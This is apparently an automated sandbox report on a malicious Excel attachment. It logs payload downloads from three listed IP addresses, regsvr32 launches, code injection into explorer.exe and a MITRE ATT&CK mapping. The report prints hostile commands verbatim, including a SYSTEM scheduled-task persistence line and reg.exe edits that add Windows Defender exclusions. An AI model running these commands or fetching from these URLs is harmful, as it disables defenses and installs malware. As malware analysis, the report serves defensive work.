    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: Claim-1368769328-09242021.xlsStream path 'Workbook' entropy: 7.94597570807 (max. 8.0)
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 3036Thread sleep count: 47 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2192Thread sleep time: -144000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 1124Thread sleep count: 46 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2520Thread sleep count: 47 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2188Thread sleep count: 31 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exe TID: 2848Thread sleep count: 46 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2664Thread sleep count: 141 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2664Thread sleep time: -112000s >= -30000sJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exe TID: 2992Thread sleep count: 31 > 30Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_6-11419
    Source: C:\Windows\SysWOW64\regsvr32.exeEvasive API call chain: GetSystemTimeAsFileTime,DecisionNodesgraph_5-12469
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Windows\SysWOW64\explorer.exeLast function: Thread delayed
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[2].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[1].datJump to dropped file
    Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\44463.7272820602[3].datJump to dropped file
    Source: C:\Windows\SysWOW64\regsvr32.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_5-11417
    Source: C:\Windows\SysWOW64\explorer.exeCheck user administrative privileges: GetTokenInformation,DecisionNodesgraph_6-10091
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,5_2_1000D01F
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000AEB4 FindFirstFileW,FindNextFileW,5_2_1000AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_0008AEB4 FindFirstFileW,FindNextFileW,6_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 14_2_0008AEB4 FindFirstFileW,FindNextFileW,14_2_0008AEB4
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_0008AEB4 FindFirstFileW,FindNextFileW,17_2_0008AEB4
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10005F82 EntryPoint,OutputDebugStringA,GetModuleHandleA,GetModuleFileNameW,GetLastError,memset,MultiByteToWideChar,GetFileAttributesW,CreateThread,SetLastError,5_2_10005F82
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10012AEC GetModuleHandleA,LoadLibraryA,GetProcAddress,GetProcAddress,5_2_10012AEC
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10029660 GetProcessHeap,RtlAllocateHeap,5_2_10029660
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1007792E mov eax, dword ptr fs:[00000030h]5_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1007785D mov eax, dword ptr fs:[00000030h]5_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_10077464 push dword ptr fs:[00000030h]5_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007792E mov eax, dword ptr fs:[00000030h]9_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_1007785D mov eax, dword ptr fs:[00000030h]9_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 9_2_10077464 push dword ptr fs:[00000030h]9_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007792E mov eax, dword ptr fs:[00000030h]12_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_1007785D mov eax, dword ptr fs:[00000030h]12_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 12_2_10077464 push dword ptr fs:[00000030h]12_2_10077464
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007792E mov eax, dword ptr fs:[00000030h]16_2_1007792E
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_1007785D mov eax, dword ptr fs:[00000030h]16_2_1007785D
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 16_2_10077464 push dword ptr fs:[00000030h]16_2_10077464
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_00085A61 RtlAddVectoredExceptionHandler,6_2_00085A61
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 17_2_00085A61 RtlAddVectoredExceptionHandler,17_2_00085A61

    HIPS / PFW / Operating System Protection Evasion:

    barindex
    Maps a DLL or memory area into another processShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeSection loaded: unknown target: C:\Windows\SysWOW64\explorer.exe protection: execute and read and writeJump to behavior
    Writes to foreign memory regionsShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E102DJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E102DJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E102DJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: B0000Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: C:\Windows\SysWOW64\explorer.exe base: 4E102DJump to behavior
    Allocates memory in foreign processesShow sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory allocated: C:\Windows\SysWOW64\explorer.exe base: B0000 protect: page read and writeJump to behavior
    Injects code into the Windows Explorer (explorer.exe)Show sources
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2208 base: B0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2208 base: 4E102D value: E9Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2180 base: B0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 2180 base: 4E102D value: E9Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 448 base: B0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 448 base: 4E102D value: E9Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1704 base: B0000 value: 9CJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeMemory written: PID: 1704 base: 4E102D value: E9Jump to behavior
    Yara detected hidden Macro 4.0 in ExcelShow sources
    Source: Yara matchFile source: Claim-1368769328-09242021.xls, type: SAMPLE
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\system32\schtasks.exe' /Create /RU 'NT AUTHORITY\SYSTEM' /tn kxizfug /tr 'regsvr32.exe -s \'C:\Users\user\Fiosa.der\'' /SC ONCE /Z /ST 17:30 /ET 17:42Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa1.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -silent ..\Fiosa2.derJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeProcess created: C:\Windows\SysWOW64\explorer.exe C:\Windows\SysWOW64\explorer.exeJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\ProgramData\Microsoft\Autiufytlfbb' /d '0'Jump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeProcess created: C:\Windows\System32\reg.exe C:\Windows\system32\reg.exe ADD 'HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths' /f /t REG_DWORD /v 'C:\Users\user\AppData\Roaming\Microsoft\Nweouxwwcjwu' /d '0'Jump to behavior
    Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe -s 'C:\Users\user\Fiosa.der'Jump to behavior
    Source: explorer.exe, 00000006.00000002.870017423.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: explorer.exe, 00000006.00000002.870017423.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: !Progman
    Source: explorer.exe, 00000006.00000002.870017423.0000000000EC0000.00000002.00020000.sdmpBinary or memory string: Program Manager<
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\regsvr32.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeQueries volume information: C:\ VolumeInformationJump to behavior
    Source: C:\Windows\SysWOW64\explorer.exeCode function: 6_2_000831C2 CreateNamedPipeA,6_2_000831C2
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000980C GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,5_2_1000980C
    Source: C:\Windows\SysWOW64\regsvr32.exeCode function: 5_2_1000D01F GetCurrentProcessId,GetModuleFileNameW,GetCurrentProcess,GetCurrentProcess,LookupAccountSidW,GetLastError,GetLastError,GetModuleFileNameW,GetLastError,MultiByteToWideChar,GetCurrentProcess,memset,GetVersionExA,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetWindowsDirectoryW,5_2_1000D01F

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsCommand and Scripting Interpreter11Scheduled Task/Job1Process Injection413Masquerading121Credential API Hooking1System Time Discovery1Remote ServicesCredential API Hooking1Exfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsScheduled Task/Job1Boot or Logon Initialization ScriptsScheduled Task/Job1Disable or Modify Tools1LSASS MemorySecurity Software Discovery2Remote Desktop ProtocolArchive Collected Data1Exfiltration Over BluetoothIngress Tool Transfer12Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsScripting2Logon Script (Windows)Logon Script (Windows)Modify Registry1Security Account ManagerVirtualization/Sandbox Evasion1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsNative API3Logon Script (Mac)Logon Script (Mac)Virtualization/Sandbox Evasion1NTDSProcess Discovery3Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol21SIM Card SwapCarrier Billing Fraud
    Cloud AccountsExploitation for Client Execution32Network Logon ScriptNetwork Logon ScriptProcess Injection413LSA SecretsFile and Directory Discovery2SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
    Replication Through Removable MediaLaunchdRc.commonRc.commonScripting2Cached Domain CredentialsSystem Information Discovery15VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
    External Remote ServicesScheduled TaskStartup ItemsStartup ItemsObfuscated Files or Information11DCSyncNetwork SniffingWindows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
    Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobSoftware Packing1Proc FilesystemNetwork Service ScanningShared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

    Behavior Graph

    Hide Legend

    Legend:

    • Process
    • Signature
    • Created File
    • DNS/IP Info
    • Is Dropped
    • Is Windows Process
    • Number of created Registry Values
    • Number of created Files
    • Visual Basic
    • Delphi
    • Java
    • .Net C# or VB.NET
    • C, C++ or other language
    • Is malicious
    • Internet
    behaviorgraph top1 signatures2 2 Behavior Graph ID: 489877 Sample: Claim-1368769328-09242021.xls Startdate: 24/09/2021 Architecture: WINDOWS Score: 100 71 Document exploit detected (drops PE files) 2->71 73 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->73 75 Sigma detected: Schedule system process 2->75 77 5 other signatures 2->77 9 EXCEL.EXE 189 37 2->9         started        14 regsvr32.exe 2->14         started        16 regsvr32.exe 2->16         started        process3 dnsIp4 65 111.90.148.104, 49168, 80 SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMY Malaysia 9->65 67 190.14.37.173, 49167, 80 OffshoreRacksSAPA Panama 9->67 69 51.89.115.111, 49169, 80 OVHFR France 9->69 55 C:\Users\user\...\44463.7272820602[3].dat, PE32 9->55 dropped 57 C:\Users\user\...\44463.7272820602[2].dat, PE32 9->57 dropped 59 C:\Users\user\...\44463.7272820602[1].dat, PE32 9->59 dropped 93 Document exploit detected (UrlDownloadToFile) 9->93 18 regsvr32.exe 9->18         started        20 regsvr32.exe 9->20         started        22 regsvr32.exe 9->22         started        24 regsvr32.exe 14->24         started        27 regsvr32.exe 16->27         started        file5 signatures6 process7 signatures8 29 regsvr32.exe 18->29         started        32 regsvr32.exe 20->32         started        34 regsvr32.exe 22->34         started        85 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 24->85 87 Injects code into the Windows Explorer (explorer.exe) 24->87 89 Writes to foreign memory regions 24->89 91 2 other signatures 24->91 36 explorer.exe 8 1 24->36         started        process9 file10 95 Overwrites code with unconditional jumps - possibly settings hooks in foreign process 29->95 97 Injects code into the Windows Explorer (explorer.exe) 29->97 99 Writes to foreign memory regions 29->99 39 explorer.exe 8 1 29->39         started        101 Allocates memory in foreign processes 32->101 103 Maps a DLL or memory area into another process 32->103 42 explorer.exe 32->42         started        45 explorer.exe 34->45         started        53 C:\Users\user\Fiosa.der, PE32 36->53 dropped 105 Uses cmd line tools excessively to alter registry or file data 36->105 47 reg.exe 1 36->47         started        49 reg.exe 1 36->49         started        signatures11 process12 file13 79 Uses cmd line tools excessively to alter registry or file data 39->79 81 Drops PE files to the user root directory 39->81 83 Uses schtasks.exe or at.exe to add and modify task schedules 39->83 51 schtasks.exe 39->51         started        61 C:\Users\user\Fiosa1.der, PE32 42->61 dropped 63 C:\Users\user\Fiosa2.der, PE32 45->63 dropped signatures14 process15

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    No Antivirus matches

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    No Antivirus matches

    URLs

    SourceDetectionScannerLabelLink
    http://111.90.148.104/44463.7272820602.dat0%Avira URL Cloudsafe
    http://www.%s.comPA0%URL Reputationsafe
    http://190.14.37.173/44463.7272820602.dat0%Avira URL Cloudsafe
    http://51.89.115.111/44463.7272820602.dat0%Avira URL Cloudsafe
    http://servername/isapibackend.dll0%Avira URL Cloudsafe

    Domains and IPs

    Contacted Domains

    No contacted domains info

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://111.90.148.104/44463.7272820602.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://190.14.37.173/44463.7272820602.datfalse
    • Avira URL Cloud: safe
    		unknown
    http://51.89.115.111/44463.7272820602.datfalse
    • Avira URL Cloud: safe
    		unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    http://www.%s.comPAregsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmp, explorer.exe, 0000000E.00000002.553204849.0000000002120000.00000002.00020000.sdmpfalse
    • URL Reputation: safe
    		low
    http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.regsvr32.exe, 00000005.00000002.497205948.0000000002260000.00000002.00020000.sdmp, explorer.exe, 00000006.00000002.870043428.00000000022C0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551601512.0000000002360000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.560498474.0000000000F60000.00000002.00020000.sdmpfalse
      		high
      http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.498695724.0000000001D80000.00000002.00020000.sdmp, regsvr32.exe, 00000005.00000002.496898931.0000000000A90000.00000002.00020000.sdmp, regsvr32.exe, 00000007.00000002.553114227.0000000001DA0000.00000002.00020000.sdmp, regsvr32.exe, 00000009.00000002.551291821.00000000008F0000.00000002.00020000.sdmp, regsvr32.exe, 0000000B.00000002.564152659.00000000009B0000.00000002.00020000.sdmp, regsvr32.exe, 0000000C.00000002.558923277.0000000000BF0000.00000002.00020000.sdmpfalse
      • Avira URL Cloud: safe
      		low

      Contacted IPs

      • No. of IPs < 25%
      • 25% < No. of IPs < 50%
      • 50% < No. of IPs < 75%
      • 75% < No. of IPs

      Public

      IPDomainCountryFlagASNASN NameMalicious
      190.14.37.173
      		unknownPanama
      		52469OffshoreRacksSAPAfalse
      51.89.115.111
      		unknownFrance
      		16276OVHFRfalse
      111.90.148.104
      		unknownMalaysia
      		45839SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYfalse

      General Information

      Joe Sandbox Version:33.0.0 White Diamond
      Analysis ID:489877
      Start date:24.09.2021
      Start time:17:26:08
      Joe Sandbox Product:CloudBasic
      Overall analysis duration:0h 13m 27s
      Hypervisor based Inspection enabled:false
      Report type:full
      Sample file name:Claim-1368769328-09242021.xls
      Cookbook file name:defaultwindowsofficecookbook.jbs
      Analysis system description:Windows 7 x64 SP1 with Office 2010 SP1 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
      Number of analysed new started processes analysed:26
      Number of new started drivers analysed:0
      Number of existing processes analysed:0
      Number of existing drivers analysed:0
      Number of injected processes analysed:0
      Technologies:
      • HCA enabled
      • EGA enabled
      • HDC enabled
      • AMSI enabled
      Analysis Mode:default
      Analysis stop reason:Timeout
      Detection:MAL
      Classification:mal100.expl.evad.winXLS@33/11@0/3
      EGA Information:
      • Successful, ratio: 100%
      HDC Information:
      • Successful, ratio: 24% (good quality ratio 22.7%)
      • Quality average: 77.2%
      • Quality standard deviation: 27%
      HCA Information:
      • Successful, ratio: 87%
      • Number of executed functions: 142
      • Number of non-executed functions: 92
      Cookbook Comments:
      • Adjust boot time
      • Enable AMSI
      • Found application associated with file extension: .xls
      • Changed system and user locale, location and keyboard layout to English - United States
      • Found Word or Excel or PowerPoint or XPS Viewer
      • Attach to Office via COM
      • Scroll down
      • Close Viewer
      Warnings:
      Show All
      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, conhost.exe, svchost.exe
      • Not all processes where analyzed, report is missing behavior information
      • Report creation exceeded maximum time and may have missing disassembly code information.
      • Report size exceeded maximum capacity and may have missing behavior information.
      • Report size getting too big, too many NtSetInformationFile calls found.

      Simulations

      Behavior and APIs

      TimeTypeDescription
      17:27:59API Interceptor51x Sleep call for process: regsvr32.exe modified
      17:28:01API Interceptor890x Sleep call for process: explorer.exe modified
      17:28:03API Interceptor1x Sleep call for process: schtasks.exe modified
      17:28:04Task SchedulerRun new task: kxizfug path: regsvr32.exe s>-s "C:\Users\user\Fiosa.der"

      Joe Sandbox View / Context

      IPs

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      190.14.37.173Claim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173/44463.6863100694.dat
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173/44463.6668827546.dat
      51.89.115.111Claim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111/44463.6863100694.dat
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111/44463.6668827546.dat
      111.90.148.104Claim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 111.90.148.104/44463.6863100694.dat
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 111.90.148.104/44463.6668827546.dat

      Domains

      No context

      ASN

      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
      OffshoreRacksSAPAClaim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 190.14.37.173
      Payment-687700136-09212021.xlsGet hashmaliciousBrowse
      • 190.14.37.232
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-851469163-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-830724601-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-40776837-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1984690372-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-1532161794-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      Permission-414467145-06252021.xlsmGet hashmaliciousBrowse
      • 190.14.37.3
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      4cDyOofgzT.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      341288734918_06172021.xlsmGet hashmaliciousBrowse
      • 190.14.37.2
      Rebate_247668103_06142021.xlsmGet hashmaliciousBrowse
      • 190.14.37.135
      SHINJIRU-MY-AS-APShinjiruTechnologySdnBhdMYClaim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 111.90.148.104
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 111.90.148.104
      b82IlqpqKM.exeGet hashmaliciousBrowse
      • 111.90.146.200
      AP.7.htmlGet hashmaliciousBrowse
      • 111.90.141.112
      z6eCorPozO.exeGet hashmaliciousBrowse
      • 111.90.151.16
      AP Remittance for bill.coleman@tetratech.com .htmlGet hashmaliciousBrowse
      • 111.90.158.219
      aia8XaelyQ.exeGet hashmaliciousBrowse
      • 111.90.151.16
      AP Remittance for tschlegelmilch@fmne.com .htmlGet hashmaliciousBrowse
      • 111.90.158.219
      Evopayments.mx--77Fax.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      B68CWSIIIV.exeGet hashmaliciousBrowse
      • 111.90.149.119
      46SGHijloy.exeGet hashmaliciousBrowse
      • 101.99.94.158
      Secured Fax_healthesystems.com.htmGet hashmaliciousBrowse
      • 111.90.158.219
      y1FOl1vVPA.exeGet hashmaliciousBrowse
      • 101.99.77.132
      K4.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      MJ.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.141.176
      PM.TA9.HTMLGet hashmaliciousBrowse
      • 111.90.139.60
      Ed0tQRwEq1.exeGet hashmaliciousBrowse
      • 101.99.91.119
      2OhLduHQ9P.exeGet hashmaliciousBrowse
      • 101.99.91.119
      AP Remittance for robert.moelke@globalfoundries.com .htmlGet hashmaliciousBrowse
      • 111.90.158.219
      pbqkCjxPOF.exeGet hashmaliciousBrowse
      • 111.90.146.149
      OVHFRClaim-1763045001-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111
      Claim-680517779-09242021.xlsGet hashmaliciousBrowse
      • 51.89.115.111
      proforma invoice_pdf_____________________________.exeGet hashmaliciousBrowse
      • 51.195.17.68
      NoO16S4omQ.exeGet hashmaliciousBrowse
      • 87.98.185.184
      9jV2cBN6cQ.exeGet hashmaliciousBrowse
      • 66.70.204.222
      HSBC94302,pdf.exeGet hashmaliciousBrowse
      • 51.254.53.102
      ZamCfP5Dev.exeGet hashmaliciousBrowse
      • 178.32.120.127
      zuyrzhibfm.exeGet hashmaliciousBrowse
      • 188.165.222.221
      INV, BL, PL.exeGet hashmaliciousBrowse
      • 94.23.48.114
      b3astmode.x86Get hashmaliciousBrowse
      • 37.59.48.250
      b3astmode.armGet hashmaliciousBrowse
      • 51.83.43.58
      New Order.docGet hashmaliciousBrowse
      • 164.132.171.176
      2xgbTybbdXGet hashmaliciousBrowse
      • 51.222.234.64
      qri9CgHh4MGet hashmaliciousBrowse
      • 51.222.234.64
      eerjoaAQC2Get hashmaliciousBrowse
      • 51.222.234.64
      fuckjewishpeople.mpslGet hashmaliciousBrowse
      • 51.222.234.64
